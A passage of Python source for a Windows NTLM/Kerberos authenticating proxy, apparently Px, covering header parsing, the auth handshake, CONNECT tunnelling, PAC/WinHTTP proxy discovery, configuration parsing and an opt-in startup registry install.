dprint("Reading response headers")
while not State.exit:
line = self.proxy_fp.readline(State.max_line).decode("utf-8")
if line == b"":
if self.proxy_socket:
self.proxy_socket.close()
self.proxy_socket = None
dprint("Proxy closed connection: %s" % resp.code)
return Response(444)
if line == "\r\n":
break
nv = line.split(":", 1)
if len(nv) != 2:
dprint("Bad header =>%s<=" % line)
continue
name = nv[0].strip()
value = nv[1].strip()
resp.headers.append((name, value))
if name.lower() != "proxy-authenticate":
dprint("Received %s: %s" % (name, value))
else:
dprint("Received %s: sanitized (%d)" % (name, len(value)))
if name.lower() == "content-length":
resp.length = int(value)
if not resp.length:
resp.body = False
elif name.lower() == "transfer-encoding" and value.lower() == "chunked":
resp.chunked = True
resp.body = True
elif name.lower() in ["proxy-connection", "connection"] and value.lower() == "close":
resp.close = True
return resp
def do_proxy_type(self):
# Connect to proxy
if not hasattr(self, "proxy_address"):
if not self.do_socket_connect():
return Response(408), None
State.proxy_type_lock.acquire()
try:
# Read State.proxy_type only once and use value for function return if it is not None;
# State.proxy_type should only be read here to avoid getting None after successfully
# identifying the proxy type if another thread clears it with load_proxy
proxy_type = State.proxy_type.get(self.proxy_address)
if proxy_type is None:
# New proxy, don't know type yet
dprint("Searching proxy type")
resp = self.do_socket()
proxy_auth = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate":
proxy_auth += header[1] + " "
if "NTLM" in proxy_auth.upper():
proxy_type = "NTLM"
elif "KERBEROS" in proxy_auth.upper():
proxy_type = "KERBEROS"
elif "NEGOTIATE" in proxy_auth.upper():
proxy_type = "NEGOTIATE"
if proxy_type is not None:
# Writing State.proxy_type only once but use local variable as return value to avoid
# losing the query result (for the current request) by clearing State.proxy_type in load_proxy
State.proxy_type[self.proxy_address] = proxy_type
dprint("Auth mechanisms: " + proxy_auth)
dprint("Selected: " + str(self.proxy_address) + ": " + str(proxy_type))
return resp, proxy_type
return Response(407), proxy_type
finally:
State.proxy_type_lock.release()
def do_transaction(self):
dprint("Entering")
ipport = self.get_destination()
if ipport not in [False, True]:
dprint("Skipping NTLM proxying")
resp = self.do_socket(destination=ipport)
elif ipport:
# Get proxy type directly from do_proxy_type instead by accessing State.proxy_type do avoid
# a race condition with clearing State.proxy_type in load_proxy which sometimes led to a proxy type
# of None (clearing State.proxy_type in one thread was done after another thread's do_proxy_type but
# before accessing State.proxy_type in the second thread)
resp, proxy_type = self.do_proxy_type()
if resp.code == 407:
# Unknown auth mechanism
if proxy_type is None:
dprint("Unknown auth mechanism expected")
return resp
# Generate auth message
ntlm = NtlmMessageGenerator(proxy_type, self.proxy_address[0])
ntlm_resp = ntlm.get_response()
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Send auth message
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
if resp.code == 407:
dprint("Auth required")
ntlm_challenge = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate" and proxy_type in header[1].upper():
h = header[1].split()
if len(h) == 2:
ntlm_challenge = h[1]
break
if ntlm_challenge:
dprint("Challenged")
ntlm_resp = ntlm.get_response(ntlm_challenge)
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Reply to challenge
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
else:
dprint("Didn't get challenge, auth didn't work")
else:
dprint("No auth required cached")
else:
dprint("No auth required")
else:
dprint("No proxy server specified and not in noproxy list")
return Response(501)
return resp
def do_HEAD(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PAC(self):
resp = Response(404)
if State.proxy_mode == MODE_PAC and "file://" in State.pac:
pac = file_url_to_local_path(State.pac)
dprint(pac)
try:
resp.code = 200
with open(pac) as p:
resp.data = p.read().encode("utf-8")
resp.body = True
resp.headers = [
("Content-Length", len(resp.data)),
("Content-Type", "application/x-ns-proxy-autoconfig")
]
except:
traceback.print_exc(file=sys.stdout)
return resp
def do_GET(self):
dprint("Entering")
dprint("Path = " + self.path)
if "/PxPACFile.pac" in self.path:
resp = self.do_PAC()
else:
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
self.fwd_resp(resp)
dprint("Done")
def do_POST(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PUT(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_DELETE(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PATCH(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_CONNECT(self):
dprint("Entering")
cl = 0
cs = 0
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
# Proxy connection may be already closed due to header (Proxy-)Connection: close
# received from proxy -> forward this to the client
if self.proxy_socket is None:
dprint("Proxy connection closed")
self.send_response(200, "True")
self.send_header("Proxy-Connection", "close")
self.end_headers()
else:
dprint("Tunneling through proxy")
self.send_response(200, "Connection established")
self.send_header("Proxy-Agent", self.version_string())
self.end_headers()
# sockets will be removed from these lists, when they are detected as closed by remote host;
# wlist contains sockets only when data has to be written
rlist = [self.connection, self.proxy_socket]
wlist = []
# data to be written to client connection and proxy socket respectively
cdata = []
sdata = []
idle = State.config.getint("settings", "idle")
max_idle = time.time() + idle
while not State.exit and (rlist or wlist):
(ins, outs, exs) = select.select(rlist, wlist, rlist, idle)
if exs:
break
if ins:
for i in ins:
if i is self.proxy_socket:
out = self.connection
wdata = cdata
source = "proxy"
else:
out = self.proxy_socket
wdata = sdata
source = "client"
data = i.recv(4096)
if data:
cl += len(data)
# Prepare data to send it later in the outs section
wdata.append(data)
if out not in outs:
outs.append(out)
max_idle = time.time() + idle
else:
# No data means connection closed by remote host
dprint("Connection closed by %s" % source)
# Because tunnel is closed on one end there is no need to read from both ends
rlist.clear()
# Do not write anymore to the closed end
if i in wlist:
wlist.remove(i)
if i in outs:
outs.remove(i)
if outs:
for o in outs:
if o is self.proxy_socket:
wdata = sdata
else:
wdata = cdata
data = wdata[0]
# socket.send() may sending only a part of the data (as documentation says).
# To ensure sending all data
bsnt = o.send(data)
if bsnt > 0:
if bsnt < len(data):
# Not all data was sent; store data not sent and ensure select() get's it
# when the socket can be written again
wdata[0] = data[bsnt:]
if o not in wlist:
wlist.append(o)
else:
wdata.pop(0)
if not data and o in wlist:
wlist.remove(o)
cs += bsnt
else:
dprint("No data sent")
max_idle = time.time() + idle
if max_idle < time.time():
# No data in timeout seconds
dprint("Proxy connection timeout")
break
# After serving the proxy tunnel it could not be used for samething else.
# A proxy doesn't really know, when a proxy tunnnel isn't needed any more (there is no content length for data).
# So servings will be ended either after timeout seconds without data transfer or
# when at least one side closes the connection.
# Close both proxy and client connection if still open.
if self.proxy_socket is not None:
dprint("Cleanup proxy connection")
self.proxy_socket.close()
self.proxy_socket = None
self.close_connection = True
dprint("%d bytes read, %d bytes written" % (cl, cs))
dprint("Done")
def fwd_data(self, resp, flush=False):
cl = resp.length
dprint("Reading response data")
if resp.body:
if cl:
dprint("Content length %d" % cl)
while cl > 0:
if cl > 4096:
l = 4096
cl -= l
else:
l = cl
cl = 0
d = self.proxy_fp.read(l)
if not flush:
self.wfile.write(d)
elif resp.chunked:
dprint("Chunked encoding")
while not State.exit:
line = self.proxy_fp.readline(State.max_line)
if not flush:
self.wfile.write(line)
line = line.decode("utf-8").strip()
if not len(line):
dprint("Blank chunk size")
break
else:
try:
csize = int(line, 16) + 2
dprint("Chunk of size %d" % csize)
except ValueError:
dprint("Bad chunk size '%s'" % line)
continue
d = self.proxy_fp.read(csize)
if not flush:
self.wfile.write(d)
if csize == 2:
dprint("No more chunks")
break
if len(d) < csize:
dprint("Chunk size doesn't match data")
break
elif resp.data is not None:
dprint("Sending data string")
if not flush:
self.wfile.write(resp.data)
else:
dprint("Not sure how much")
while not State.exit:
time.sleep(0.1)
d = self.proxy_fp.read(1024)
if not flush:
self.wfile.write(d)
if len(d) < 1024:
break
if resp.close and self.proxy_socket:
dprint("Close proxy connection per header")
self.proxy_socket.close()
self.proxy_socket = None
def fwd_resp(self, resp):
dprint("Entering")
self.send_response(resp.code)
for header in resp.headers:
dprint("Returning %s: %s" % (header[0], header[1]))
self.send_header(header[0], header[1])
self.end_headers()
self.fwd_data(resp)
dprint("Done")
def get_destination(self):
netloc = self.path
path = "/"
if self.command != "CONNECT":
parse = urlparse.urlparse(self.path, allow_fragments=False)
if parse.netloc:
netloc = parse.netloc
if ":" not in netloc:
port = parse.port
if not port:
if parse.scheme == "http":
port = 80
elif parse.scheme == "https":
port = 443
elif parse.scheme == "ftp":
port = 21
netloc = netloc + ":" + str(port)
path = parse.path or "/"
if parse.params:
path = path + ";" + parse.params
if parse.query:
path = path + "?" + parse.query
dprint(netloc)
# Check destination for noproxy first, before doing any expensive stuff
# possibly involving connections
if State.noproxy.size:
addr = []
spl = netloc.split(":", 1)
try:
addr = socket.getaddrinfo(spl[0], int(spl[1]))
except socket.gaierror:
# Couldn't resolve, let parent proxy try, #18
dprint("Couldn't resolve host")
if len(addr) and len(addr[0]) == 5:
ipport = addr[0][4]
dprint("%s => %s + %s" % (self.path, ipport, path))
if ipport[0] in State.noproxy:
dprint("Direct connection from noproxy configuration")
self.path = path
return ipport
# Get proxy mode and servers straight from load_proxy to avoid
# threading issues
(proxy_mode, self.proxy_servers) = load_proxy()
if proxy_mode in [MODE_AUTO, MODE_PAC]:
proxy_str = find_proxy_for_url(
("https://" if "://" not in self.path else "") + self.path)
if proxy_str == "DIRECT":
ipport = netloc.split(":")
ipport[1] = int(ipport[1])
dprint("Direct connection from PAC")
self.path = path
return tuple(ipport)
if proxy_str:
dprint("Proxy from PAC = " + str(proxy_str))
# parse_proxy does not modify State.proxy_server any more,
# it returns the proxy server tuples instead, because proxy_str
# contains only the proxy servers for the URL served by this thread
self.proxy_servers = parse_proxy(proxy_str)
return True if self.proxy_servers else False
###
# Multi-processing and multi-threading
def get_host_ips():
localips = [ip[4][0] for ip in socket.getaddrinfo(socket.gethostname(), 80, socket.AF_INET)]
localips.insert(0, "127.0.0.1")
return localips
class PoolMixIn(socketserver.ThreadingMixIn):
def process_request(self, request, client_address):
self.pool.submit(self.process_request_thread, request, client_address)
def verify_request(self, request, client_address):
dprint("Client address: %s" % client_address[0])
if client_address[0] in State.allow:
return True
if State.hostonly and client_address[0] in get_host_ips():
dprint("Host-only IP allowed")
return True
dprint("Client not allowed: %s" % client_address[0])
return False
class ThreadedTCPServer(PoolMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
socketserver.TCPServer.__init__(self, server_address,
RequestHandlerClass, bind_and_activate)
try:
# Workaround bad thread naming code in Python 3.6+, fixed in master
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=State.config.getint("settings", "threads"),
thread_name_prefix="Thread")
except:
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=State.config.getint("settings", "threads"))
def print_banner():
pprint("Serving at %s:%d proc %s" % (
State.config.get("proxy", "listen").strip(),
State.config.getint("proxy", "port"),
multiprocessing.current_process().name)
)
if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
if State.config.getint("settings", "foreground") == 0:
detach_console()
for section in State.config.sections():
for option in State.config.options(section):
dprint(section + ":" + option + " = " + State.config.get(section, option))
def serve_forever(httpd):
signal.signal(signal.SIGINT, signal.SIG_DFL)
try:
httpd.serve_forever()
except KeyboardInterrupt:
dprint("Exiting")
State.exit = True
httpd.shutdown()
def start_worker(pipeout):
parse_config()
httpd = ThreadedTCPServer(
(State.config.get("proxy", "listen").strip(), State.config.getint("proxy", "port")),
Proxy, bind_and_activate=False
)
mainsock = socket.fromshare(pipeout.recv())
httpd.socket = mainsock
print_banner()
serve_forever(httpd)
def run_pool():
try:
httpd = ThreadedTCPServer((State.config.get("proxy", "listen").strip(),
State.config.getint("proxy", "port")), Proxy)
except OSError as exc:
if "attempt was made" in str(exc):
print("Px failed to start - port in use")
else:
pprint(exc)
return
mainsock = httpd.socket
print_banner()
if hasattr(socket, "fromshare"):
workers = State.config.getint("settings", "workers")
for i in range(workers-1):
(pipeout, pipein) = multiprocessing.Pipe()
p = multiprocessing.Process(target=start_worker, args=(pipeout,))
p.daemon = True
p.start()
while p.pid is None:
time.sleep(1)
pipein.send(mainsock.share(p.pid))
serve_forever(httpd)
###
# Proxy detection
class WINHTTP_CURRENT_USER_IE_PROXY_CONFIG(ctypes.Structure):
_fields_ = [("fAutoDetect", ctypes.wintypes.BOOL), # "Automatically detect settings"
("lpszAutoConfigUrl", ctypes.wintypes.LPWSTR), # "Use automatic configuration script, Address"
("lpszProxy", ctypes.wintypes.LPWSTR), # "1.2.3.4:5" if "Use the same proxy server for all protocols",
# else advanced "ftp=1.2.3.4:5;http=1.2.3.4:5;https=1.2.3.4:5;socks=1.2.3.4:5"
("lpszProxyBypass", ctypes.wintypes.LPWSTR), # ";"-separated list, "Bypass proxy server for local addresses" adds "<local>"
]
class WINHTTP_AUTOPROXY_OPTIONS(ctypes.Structure):
_fields_ = [("dwFlags", ctypes.wintypes.DWORD),
("dwAutoDetectFlags", ctypes.wintypes.DWORD),
("lpszAutoConfigUrl", ctypes.wintypes.LPCWSTR),
("lpvReserved", ctypes.c_void_p),
("dwReserved", ctypes.wintypes.DWORD),
("fAutoLogonIfChallenged", ctypes.wintypes.BOOL), ]
class WINHTTP_PROXY_INFO(ctypes.Structure):
_fields_ = [("dwAccessType", ctypes.wintypes.DWORD),
("lpszProxy", ctypes.wintypes.LPCWSTR),
("lpszProxyBypass", ctypes.wintypes.LPCWSTR), ]
# Parameters for WinHttpOpen, http://msdn.microsoft.com/en-us/library/aa384098(VS.85).aspx
WINHTTP_NO_PROXY_NAME = 0
WINHTTP_NO_PROXY_BYPASS = 0
WINHTTP_FLAG_ASYNC = 0x10000000
# dwFlags values
WINHTTP_AUTOPROXY_AUTO_DETECT = 0x00000001
WINHTTP_AUTOPROXY_CONFIG_URL = 0x00000002
# dwAutoDetectFlags values
WINHTTP_AUTO_DETECT_TYPE_DHCP = 0x00000001
WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x00000002
# dwAccessType values
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0
WINHTTP_ACCESS_TYPE_NO_PROXY = 1
WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3
WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY = 4
# Error messages
WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT = 12167
def winhttp_find_proxy_for_url(url, autodetect=False, pac_url=None, autologon=True):
# Fix issue #51
ACCESS_TYPE = WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY
if WIN_VERSION < 6.3:
ACCESS_TYPE = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY
ctypes.windll.winhttp.WinHttpOpen.restype = ctypes.c_void_p
hInternet = ctypes.windll.winhttp.WinHttpOpen(
ctypes.wintypes.LPCWSTR("Px"),
ACCESS_TYPE, WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, WINHTTP_FLAG_ASYNC)
if not hInternet:
dprint("WinHttpOpen failed: " + str(ctypes.GetLastError()))
return ""
autoproxy_options = WINHTTP_AUTOPROXY_OPTIONS()
if pac_url:
autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL
autoproxy_options.dwAutoDetectFlags = 0
autoproxy_options.lpszAutoConfigUrl = pac_url
elif autodetect:
autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT
autoproxy_options.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A
autoproxy_options.lpszAutoConfigUrl = 0
else:
return ""
autoproxy_options.fAutoLogonIfChallenged = autologon
proxy_info = WINHTTP_PROXY_INFO()
# Fix issue #43
ctypes.windll.winhttp.WinHttpGetProxyForUrl.argtypes = [ctypes.c_void_p,
ctypes.wintypes.LPCWSTR, ctypes.POINTER(WINHTTP_AUTOPROXY_OPTIONS),
ctypes.POINTER(WINHTTP_PROXY_INFO)]
ok = ctypes.windll.winhttp.WinHttpGetProxyForUrl(hInternet, ctypes.wintypes.LPCWSTR(url),
ctypes.byref(autoproxy_options), ctypes.byref(proxy_info))
if not ok:
error = ctypes.GetLastError()
dprint("WinHttpGetProxyForUrl error %s" % error)
if error == WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT:
dprint("Could not download PAC file, trying DIRECT instead")
return "DIRECT"
return ""
if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NAMED_PROXY:
# Note: proxy_info.lpszProxyBypass makes no sense here!
if not proxy_info.lpszProxy:
dprint('WinHttpGetProxyForUrl named proxy without name')
return ""
return proxy_info.lpszProxy.replace(" ", ",").replace(";", ",").replace(",DIRECT", "") # Note: We only see the first!
if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NO_PROXY:
return "DIRECT"
# WinHttpCloseHandle()
dprint("WinHttpGetProxyForUrl accesstype %s" % (proxy_info.dwAccessType,))
return ""
def file_url_to_local_path(file_url):
parts = urlparse.urlparse(file_url)
path = urlparse.unquote(parts.path)
if path.startswith('/') and not path.startswith('//'):
if len(parts.netloc) == 2 and parts.netloc[1] == ':':
return parts.netloc + path
return 'C:' + path
if len(path) > 2 and path[1] == ':':
return path
def load_proxy(quiet=False):
# Return if proxies specified in Px config
if State.proxy_mode == MODE_CONFIG:
return (State.proxy_mode, State.proxy_server)
# Do locking to avoid updating globally shared State object by multiple
# threads simultaneously
State.proxy_mode_lock.acquire()
try:
proxy_mode = State.proxy_mode
proxy_servers = State.proxy_server
# Check if need to refresh
if (State.proxy_refresh is not None and
time.time() - State.proxy_refresh <
State.config.getint("settings", "proxyreload")):
if not quiet:
dprint("Skip proxy refresh")
return (proxy_mode, proxy_servers)
# Start with clean proxy mode and server list
proxy_mode = MODE_NONE
proxy_servers = []
# Get proxy info from Internet Options
ie_proxy_config = WINHTTP_CURRENT_USER_IE_PROXY_CONFIG()
ok = ctypes.windll.winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(ie_proxy_config))
if not ok:
if not quiet:
dprint(ctypes.GetLastError())
else:
if ie_proxy_config.fAutoDetect:
proxy_mode = MODE_AUTO
elif ie_proxy_config.lpszAutoConfigUrl:
State.pac = ie_proxy_config.lpszAutoConfigUrl
proxy_mode = MODE_PAC
if not quiet:
dprint("AutoConfigURL = " + State.pac)
else:
# Manual proxy
proxies = []
proxies_str = ie_proxy_config.lpszProxy or ""
for proxy_str in proxies_str.lower().replace(' ', ';').split(';'):
if '=' in proxy_str:
scheme, proxy = proxy_str.split('=', 1)
if scheme.strip() != "ftp":
proxies.append(proxy)
elif proxy_str:
proxies.append(proxy_str)
if proxies:
proxy_servers = parse_proxy(",".join(proxies))
proxy_mode = MODE_MANUAL
# Proxy exceptions into noproxy
bypass_str = ie_proxy_config.lpszProxyBypass or "" # FIXME: Handle "<local>"
bypasses = [h.strip() for h in bypass_str.lower().replace(' ', ';').split(';')]
for bypass in bypasses:
try:
ipns = netaddr.IPGlob(bypass)
State.noproxy.add(ipns)
if not quiet:
dprint("Noproxy += " + bypass)
except:
State.noproxy_hosts.append(bypass)
if not quiet:
dprint("Noproxy hostname += " + bypass)
State.proxy_refresh = time.time()
if not quiet:
dprint("Proxy mode = " + str(proxy_mode))
State.proxy_mode = proxy_mode
State.proxy_server = proxy_servers
# Clear proxy types on proxy server update
State.proxy_type = {}
finally:
State.proxy_mode_lock.release()
return (proxy_mode, proxy_servers)
def find_proxy_for_url(url):
proxy_str = ""
if State.proxy_mode == MODE_AUTO:
proxy_str = winhttp_find_proxy_for_url(url, autodetect=True)
elif State.proxy_mode == MODE_PAC:
pac = State.pac
if "file://" in State.pac:
host = State.config.get("proxy", "listen") or "localhost"
port = State.config.getint("proxy", "port")
pac = "http://%s:%d/PxPACFile.pac" % (host, port)
dprint("PAC URL is local: " + pac)
proxy_str = winhttp_find_proxy_for_url(url, pac_url=pac)
# Handle edge case if the result is a list that starts with DIRECT. Assume
# everything should be direct as the string DIRECT is tested explicitly in
# get_destination
if proxy_str.startswith("DIRECT,"):
proxy_str = "DIRECT"
dprint("Proxy found: " + proxy_str)
return proxy_str
###
# Parse settings and command line
def parse_proxy(proxystrs):
if not proxystrs:
return []
servers = []
for proxystr in [i.strip() for i in proxystrs.split(",")]:
pserver = [i.strip() for i in proxystr.split(":")]
if len(pserver) == 1:
pserver.append(80)
elif len(pserver) == 2:
try:
pserver[1] = int(pserver[1])
except ValueError:
pprint("Bad proxy server port: " + pserver[1])
sys.exit()
else:
pprint("Bad proxy server definition: " + proxystr)
sys.exit()
if tuple(pserver) not in servers:
servers.append(tuple(pserver))
return servers
def parse_ip_ranges(iprangesconfig):
ipranges = netaddr.IPSet([])
iprangessplit = [i.strip() for i in iprangesconfig.split(",")]
for iprange in iprangessplit:
if not iprange:
continue
try:
if "-" in iprange:
spl = iprange.split("-", 1)
ipns = netaddr.IPRange(spl[0], spl[1])
elif "*" in iprange:
ipns = netaddr.IPGlob(iprange)
else:
ipns = netaddr.IPNetwork(iprange)
ipranges.add(ipns)
except:
pprint("Bad IP definition: %s" % iprangesconfig)
sys.exit()
return ipranges
def parse_allow(allow):
State.allow = parse_ip_ranges(allow)
def parse_noproxy(noproxy):
State.noproxy = parse_ip_ranges(noproxy)
def set_useragent(useragent):
State.useragent = useragent
def set_username(username):
ud = username.split("\\")
if len(ud) == 2:
State.username = ud[1]
State.domain = ud[0]
else:
State.username = username
def cfg_int_init(section, name, default, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
try:
val = int(val)
except ValueError:
pprint("Invalid integer value for " + section + ":" + name)
State.config.set(section, name, str(val))
def cfg_float_init(section, name, default, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
try:
val = float(val)
except ValueError:
pprint("Invalid float value for " + section + ":" + name)
State.config.set(section, name, str(val))
def cfg_str_init(section, name, default, proc=None, override=False):
val = default
if not override:
try:
val = State.config.get(section, name).strip()
except configparser.NoOptionError:
pass
State.config.set(section, name, val)
if proc != None:
proc(val)
def save():
with open(State.ini, "w") as cfgfile:
State.config.write(cfgfile)
pprint("Saved config to " + State.ini + "\n")
with open(State.ini, "r") as cfgfile:
sys.stdout.write(cfgfile.read())
sys.exit()
def parse_config():
if "--debug" in sys.argv:
State.logger = Log(dfile(), "w")
if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
attach_console()
if "-h" in sys.argv or "--help" in sys.argv:
pprint(HELP)
sys.exit()
# Load configuration file
State.config = configparser.ConfigParser()
State.ini = os.path.join(os.path.dirname(get_script_path()), State.ini)
for i in range(len(sys.argv)):
if "=" in sys.argv[i]:
val = sys.argv[i].split("=")[1]
if "--config=" in sys.argv[i]:
State.ini = val
if not os.path.exists(val) and "--save" not in sys.argv:
pprint("Could not find config file: " + val)
sys.exit()
if os.path.exists(State.ini):
State.config.read(State.ini)
# [proxy] section
if "proxy" not in State.config.sections():
State.config.add_section("proxy")
cfg_str_init("proxy", "server", "")
cfg_int_init("proxy", "port", "3128")
cfg_str_init("proxy", "listen", "127.0.0.1")
cfg_str_init("proxy", "allow", "*.*.*.*", parse_allow)
cfg_int_init("proxy", "gateway", "0")
cfg_int_init("proxy", "hostonly", "0")
cfg_str_init("proxy", "noproxy", "", parse_noproxy)
cfg_str_init("proxy", "useragent", "", set_useragent)
cfg_str_init("proxy", "username", "", set_username)
# [settings] section
if "settings" not in State.config.sections():
State.config.add_section("settings")
cfg_int_init("settings", "workers", "2")
cfg_int_init("settings", "threads", "5")
cfg_int_init("settings", "idle", "30")
cfg_float_init("settings", "socktimeout", "20.0")
cfg_int_init("settings", "proxyreload", "60")
cfg_int_init("settings", "foreground", "0")
cfg_int_init("settings", "log", "0" if State.logger is None else "1")
if State.config.get("settings", "log") == "1" and State.logger is None:
State.logger = Log(dfile(), "w")
# Command line flags
for i in range(len(sys.argv)):
if "=" in sys.argv[i]:
val = sys.argv[i].split("=")[1]
if "--proxy=" in sys.argv[i] or "--server=" in sys.argv[i]:
cfg_str_init("proxy", "server", val, None, True)
elif "--listen=" in sys.argv[i]:
cfg_str_init("proxy", "listen", val, None, True)
elif "--port=" in sys.argv[i]:
cfg_int_init("proxy", "port", val, True)
elif "--allow=" in sys.argv[i]:
cfg_str_init("proxy", "allow", val, parse_allow, True)
elif "--noproxy=" in sys.argv[i]:
cfg_str_init("proxy", "noproxy", val, parse_noproxy, True)
elif "--useragent=" in sys.argv[i]:
cfg_str_init("proxy", "useragent", val, set_useragent, True)
elif "--username=" in sys.argv[i]:
cfg_str_init("proxy", "username", val, set_username, True)
else:
for j in ["workers", "threads", "idle", "proxyreload"]:
if "--" + j + "=" in sys.argv[i]:
cfg_int_init("settings", j, val, True)
for j in ["socktimeout"]:
if "--" + j + "=" in sys.argv[i]:
cfg_float_init("settings", j, val, True)
if "--gateway" in sys.argv:
cfg_int_init("proxy", "gateway", "1", True)
if "--hostonly" in sys.argv:
cfg_int_init("proxy", "hostonly", "1", True)
if "--foreground" in sys.argv:
cfg_int_init("settings", "foreground", "1", True)
###
# Dependency propagation
# If gateway mode
if State.config.getint("proxy", "gateway") == 1:
# Listen on all interfaces
cfg_str_init("proxy", "listen", "", None, True)
# If hostonly mode
if State.config.getint("proxy", "hostonly") == 1:
State.hostonly = True
# Listen on all interfaces
cfg_str_init("proxy", "listen", "", None, True)
# If not gateway mode or gateway with default allow rules
if (State.config.getint("proxy", "gateway") == 0 or
(State.config.getint("proxy", "gateway") == 1 and
State.config.get("proxy", "allow") in ["*.*.*.*", "0.0.0.0/0"])):
# Purge allow rules
cfg_str_init("proxy", "allow", "", parse_allow, True)
State.proxy_server = parse_proxy(State.config.get("proxy", "server"))
if "--install" in sys.argv:
install()
elif "--uninstall" in sys.argv:
uninstall()
elif "--quit" in sys.argv:
quit()
elif "--save" in sys.argv:
save()
if State.proxy_server:
State.proxy_mode = MODE_CONFIG
else:
load_proxy(quiet=True)
if State.proxy_mode == MODE_NONE and not State.config.get("proxy", "noproxy"):
pprint("No proxy server or noproxy list defined")
sys.exit()
socket.setdefaulttimeout(State.config.getfloat("settings", "socktimeout"))
###
# Exit related
def quit(force=False):
count = 0
mypids = [os.getpid(), os.getppid()]
for pid in sorted(psutil.pids(), reverse=True):
if pid in mypids:
continue
try:
p = psutil.Process(pid)
if p.exe().lower() == sys.executable.lower():
count += 1
if force:
p.kill()
else:
p.send_signal(signal.CTRL_C_EVENT)
except (psutil.AccessDenied, psutil.NoSuchProcess, PermissionError, SystemError):
pass
except:
traceback.print_exc(file=sys.stdout)
if count != 0:
if force:
sys.stdout.write(".")
else:
sys.stdout.write("Quitting Px ..")
time.sleep(4)
sys.stdout.flush()
quit(True)
else:
if force:
pprint(" DONE")
else:
pprint("Px is not running")
sys.exit()
def handle_exceptions(extype, value, tb):
# Create traceback log
lst = traceback.format_tb(tb, None) + traceback.format_exception_only(extype, value)
tracelog = '\nTraceback (most recent call last):\n' + "%-20s%s\n" % ("".join(lst[:-1]), lst[-1])
if State.logger != None:
pprint(tracelog)
else:
sys.stderr.write(tracelog)
# Save to debug.log
dbg = open(dfile(), 'w')
dbg.write(tracelog)
dbg.close()
###
# Install Px to startup
def get_script_path():
if getattr(sys, "frozen", False) is False:
# Script mode
return os.path.normpath(os.path.join(os.getcwd(), sys.argv[0]))
# Frozen mode
return sys.executable
def get_script_cmd():
spath = get_script_path()
if os.path.splitext(spath)[1].lower() == ".py":
return sys.executable + ' "%s"' % spath
return spath
def check_installed():
ret = True
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_READ)
try:
winreg.QueryValueEx(runkey, "Px")
except:
ret = False
winreg.CloseKey(runkey)
return ret
def install():
if check_installed() is False:
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
winreg.SetValueEx(runkey, "Px", 0, winreg.REG_EXPAND_SZ, get_script_cmd())
winreg.CloseKey(runkey)
pprint("Px installed successfully")
else:
pprint("Px already installed")
sys.exit()
def uninstall():
if check_installed() is True:
runkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
winreg.DeleteValue(runkey, "Px")
winreg.CloseKey(runkey)
pprint("Px uninstalled successfully")
else:
pprint("Px is not installed")
sys.exit()
###
# Attach/detach console
def attach_console():
if ctypes.windll.kernel32.GetConsoleWindow() != 0:
dprint("Already attached to a console")
return
# Find parent cmd.exe if exists
pid = os.getpid()
while True:
try:
p = psutil.Process(pid)
except psutil.NoSuchProcess:
# No such parent - started without console
pid = -1
break
if os.path.basename(p.name()).lower() in ["cmd", "cmd.exe", "powershell", "powershell.exe"]:
# Found it
break
# Search parent
pid = p.ppid()
# Not found, started without console
if pid == -1:
dprint("No parent console to attach to")
return
dprint("Attaching to console " + str(pid))
if ctypes.windll.kernel32.AttachConsole(pid) == 0:
dprint("Attach failed with error " + str(ctypes.windll.kernel32.GetLastError()))
return
if ctypes.windll.kernel32.GetConsoleWindow() == 0:
dprint("Not a console window")
return
reopen_stdout()
def detach_console():
if ctypes.windll.kernel32.GetConsoleWindow() == 0:
return
restore_stdout()
if not ctypes.windll.kernel32.FreeConsole():
dprint("Free console failed with error " + str(ctypes.windll.kernel32.GetLastError()))
else:
